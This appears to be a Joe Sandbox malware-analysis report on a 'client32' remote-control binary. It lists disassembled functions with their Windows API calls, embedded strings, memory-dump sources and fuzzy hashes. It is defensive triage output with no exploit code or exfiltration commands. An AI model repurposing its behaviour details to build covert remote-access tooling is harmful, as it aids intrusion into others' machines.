                                                                                                                                                                                  • Part of subcall function 6C602420: _strrchr.LIBCMT ref: 6C60242E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
                                                                                                                                                                                • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                                                                                                                                • API String ID: 2714439535-3484705551
                                                                                                                                                                                • Opcode ID: 3d712884a02a188c44d45e8087dba1bf202fb10f387c8043212b79fb515547a6
                                                                                                                                                                                • Instruction ID: ae16793310a7ec183fa69b28d2041ac240423907c775405fda050f7087acc9fe
                                                                                                                                                                                • Opcode Fuzzy Hash: 3d712884a02a188c44d45e8087dba1bf202fb10f387c8043212b79fb515547a6
                                                                                                                                                                                • Instruction Fuzzy Hash: 8B41F871B00218ABDB18DB52DD84FEA7778EF4A708F008455EA05F7A50EB709A49CF6C
                                                                                                                                                                                Function 111037D0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 11089560: UnhookWindowsHookEx.USER32(?), ref: 11089583
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 111037EC
                                                                                                                                                                                • GetThreadDesktop.USER32(00000000), ref: 111037F3
                                                                                                                                                                                • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11103803
                                                                                                                                                                                • SetThreadDesktop.USER32(00000000), ref: 11103810
                                                                                                                                                                                • CloseDesktop.USER32(00000000), ref: 11103829
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 11103831
                                                                                                                                                                                • CloseDesktop.USER32(00000000), ref: 11103847
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 1110384F
                                                                                                                                                                                Strings
                                                                                                                                                                                • OpenDesktop(%s) failed, e=%d, xrefs: 11103857
                                                                                                                                                                                • SetThreadDesktop(%s) failed, e=%d, xrefs: 11103839
                                                                                                                                                                                • SetThreadDesktop(%s) ok, xrefs: 1110381B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                                                                                                                • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                                                                                                                • API String ID: 2036220054-60805735
                                                                                                                                                                                • Opcode ID: 812077c9c6dd4a72db5f1f30e174a3030d5b1acb6b00d9021a549a952c9b4f52
                                                                                                                                                                                • Instruction ID: e88c17566eeed1fb37d42defb77813990fcfc850afde34c4ed6f8b5b44c54373
                                                                                                                                                                                • Opcode Fuzzy Hash: 812077c9c6dd4a72db5f1f30e174a3030d5b1acb6b00d9021a549a952c9b4f52
                                                                                                                                                                                • Instruction Fuzzy Hash: 4A112979F402196BE7047BB25C89F6FFA2C9F8561DF000038F8268A645EF24A40083B6
                                                                                                                                                                                Function 1115F240 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115F268
                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 1115F275
                                                                                                                                                                                • wsprintfA.USER32 ref: 1115F288
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                  • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                                                                                                                • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115F2CC
                                                                                                                                                                                • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115F2D9
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                                                                                                                • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                                                                                                                • API String ID: 1734919802-1728070458
                                                                                                                                                                                • Opcode ID: ad6d5536cf3d762fe2a551cbd276592da76a6a07cf3a5aad7775a2b80f191352
                                                                                                                                                                                • Instruction ID: 07e815115c29277e6575bd3acbfe434a71258061b731743832bfb2ada14664d5
                                                                                                                                                                                • Opcode Fuzzy Hash: ad6d5536cf3d762fe2a551cbd276592da76a6a07cf3a5aad7775a2b80f191352
                                                                                                                                                                                • Instruction Fuzzy Hash: BB1127B5A4031AEBC720EFE69C80ED5F7B4FF22718B00466EE46643140EB70E544CB81
                                                                                                                                                                                Function 11110DE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                                                • std::exception::exception.LIBCMT ref: 11110E4A
                                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 11110E5F
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(-00000010,?,000000FF,?,11027947,00000001,00000424), ref: 11110E89
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(111F18F0,?,000000FF,?,11027947,00000001,00000424), ref: 11110E98
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(111F18F0,?,000000FF,?,11027947), ref: 11110EAC
                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,?,11027947), ref: 11110ED2
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111F18F0,?,000000FF,?,11027947), ref: 11110F5F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrowstd::exception::exceptionwsprintf
                                                                                                                                                                                • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                                                                                                • API String ID: 1404914877-1024648535
                                                                                                                                                                                • Opcode ID: 9ab39d6e428c5abbd25297b93759f0d38524f94e5d9505e2670363b36f0c8c1b
                                                                                                                                                                                • Instruction ID: f3d5edf841f59403b8991f5d6a5c2e10d1098d1cef77e9e1f9f0bcea7e620dca
                                                                                                                                                                                • Opcode Fuzzy Hash: 9ab39d6e428c5abbd25297b93759f0d38524f94e5d9505e2670363b36f0c8c1b
                                                                                                                                                                                • Instruction Fuzzy Hash: 2141AD75E00626AFDB11CFB98D80AAAFBF4FB45708F00453AF815DB248E77599048B91
                                                                                                                                                                                Function 1115C8E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,2520CF5D,00000000,?), ref: 1115C927
                                                                                                                                                                                • CoCreateInstance.OLE32(111C627C,00000000,00000017,111C61AC,?), ref: 1115C947
                                                                                                                                                                                • wsprintfW.USER32 ref: 1115C967
                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 1115C973
                                                                                                                                                                                • wsprintfW.USER32 ref: 1115CA27
                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 1115CAC8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                                                                                                • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                                                                                                • API String ID: 3050498177-823534439
                                                                                                                                                                                • Opcode ID: b28c94d27272bd4d2c7a6316e1565962f0335f23aedb7733e3d90eb726d980ce
                                                                                                                                                                                • Instruction ID: 91bf14772fb0e49150e0dc85e0cb347219a857647afd576183cc1e94570c565b
                                                                                                                                                                                • Opcode Fuzzy Hash: b28c94d27272bd4d2c7a6316e1565962f0335f23aedb7733e3d90eb726d980ce
                                                                                                                                                                                • Instruction Fuzzy Hash: 04518071B40619AFC764CF69CC94F9AFBB8EB8A714F0046A9E429D7640DA30AE41CF51
                                                                                                                                                                                Function 6C612F80 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _calloc.LIBCMT ref: 6C612FBB
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 6C61300D
                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 6C61301B
                                                                                                                                                                                • _calloc.LIBCMT ref: 6C61303B
                                                                                                                                                                                • _memmove.LIBCMT ref: 6C613049
                                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 6C61307F
                                                                                                                                                                                • SetEvent.KERNEL32(00000338,?,?,?,?,?,?,?,?,?,?,?,?,?,?,939B34B3), ref: 6C61308C
                                                                                                                                                                                  • Part of subcall function 6C6128D0: wsprintfA.USER32 ref: 6C612965
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                                                                                                                                • String ID: a3al$a3al
                                                                                                                                                                                • API String ID: 3178096747-1571842137
                                                                                                                                                                                • Opcode ID: ca4d9ad8b8a97196c20c3d7d95eb76042aa8df3754a549b48fd3c55c43e8b42c
                                                                                                                                                                                • Instruction ID: 1a498b4717bba2fbc3f28a7285687861805242a97e6d80d6faa43d3f4aa71f0d
                                                                                                                                                                                • Opcode Fuzzy Hash: ca4d9ad8b8a97196c20c3d7d95eb76042aa8df3754a549b48fd3c55c43e8b42c
                                                                                                                                                                                • Instruction Fuzzy Hash: 0E41A9B5D04209AFDB00DFA9C844AEFB7FCEF49705F008529E50AE7640E7749644CBA8
                                                                                                                                                                                Function 6C620D40 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,6C620F2B,32ADAD4B,00000000,?,?,6C63F278,000000FF,?,6C60AE0A,?,00000000,?,00000080), ref: 6C620D48
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 6C620D5B
                                                                                                                                                                                • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6C64CB4C,?,?,6C63F278,000000FF,?,6C60AE0A,?,00000000,?,00000080), ref: 6C620D76
                                                                                                                                                                                • _malloc.LIBCMT ref: 6C620D8C
                                                                                                                                                                                  • Part of subcall function 6C621B69: __FF_MSGBANNER.LIBCMT ref: 6C621B82
                                                                                                                                                                                  • Part of subcall function 6C621B69: __NMSG_WRITE.LIBCMT ref: 6C621B89
                                                                                                                                                                                  • Part of subcall function 6C621B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6C62D3C1,6C626E81,00000001,6C626E81,?,6C62F447,00000018,6C647738,0000000C,6C62F4D7), ref: 6C621BAE
                                                                                                                                                                                • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6C63F278,000000FF,?,6C60AE0A,?,00000000,?), ref: 6C620D9F
                                                                                                                                                                                • _free.LIBCMT ref: 6C620D84
                                                                                                                                                                                  • Part of subcall function 6C621BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6C621C13
                                                                                                                                                                                  • Part of subcall function 6C621BFD: GetLastError.KERNEL32(00000000), ref: 6C621C25
                                                                                                                                                                                • _free.LIBCMT ref: 6C620DAF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                                                                                                                • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                                                                                                                • API String ID: 1360380336-1843585929
                                                                                                                                                                                • Opcode ID: 2863a81554cee01346e4f6492bfe296d8ae68dc602d1332a353eae56da67cd71
                                                                                                                                                                                • Instruction ID: 52df02f2ff9100a0e5f5ca4719a1441119de6b71b5dfa8e861fc9f4db1a5f8dc
                                                                                                                                                                                • Opcode Fuzzy Hash: 2863a81554cee01346e4f6492bfe296d8ae68dc602d1332a353eae56da67cd71
                                                                                                                                                                                • Instruction Fuzzy Hash: 0B01D4B52013416BE7309B708C95F5776E89B41B09F208D2CF9658BA80EA7AF844CB2C
                                                                                                                                                                                Function 11061320 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 289registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegQueryInfoKeyA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,2520CF5D,00000000,00000000,11061A96), ref: 110613A4
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                • RegEnumValueA.ADVAPI32(00000000,?,00000000,11061A96,00000000,00000000,00000000,00000000,2520CF5D,00000000,00000000), ref: 1106142B
                                                                                                                                                                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 11061492
                                                                                                                                                                                • _free.LIBCMT ref: 110614A4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_freewsprintf
                                                                                                                                                                                • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                                                                                                                • API String ID: 3533473494-161875503
                                                                                                                                                                                • Opcode ID: 5b01389ee77ac44792f58dfc4d5b99a1f0518d0f248febb5cdf1ca1cdc326709
                                                                                                                                                                                • Instruction ID: 6cc8e5caf6a1957f468abfb3494a260dc46a483def11051c8948769c459486e3
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b01389ee77ac44792f58dfc4d5b99a1f0518d0f248febb5cdf1ca1cdc326709
                                                                                                                                                                                • Instruction Fuzzy Hash: 78A1A175A007469FE721CF64C880BABFBF8AF49304F144A5DE59697680E771F508CBA1
                                                                                                                                                                                Function 11010140 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1101016D
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 11010190
                                                                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 11010214
                                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 11010222
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 11010235
                                                                                                                                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101024F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
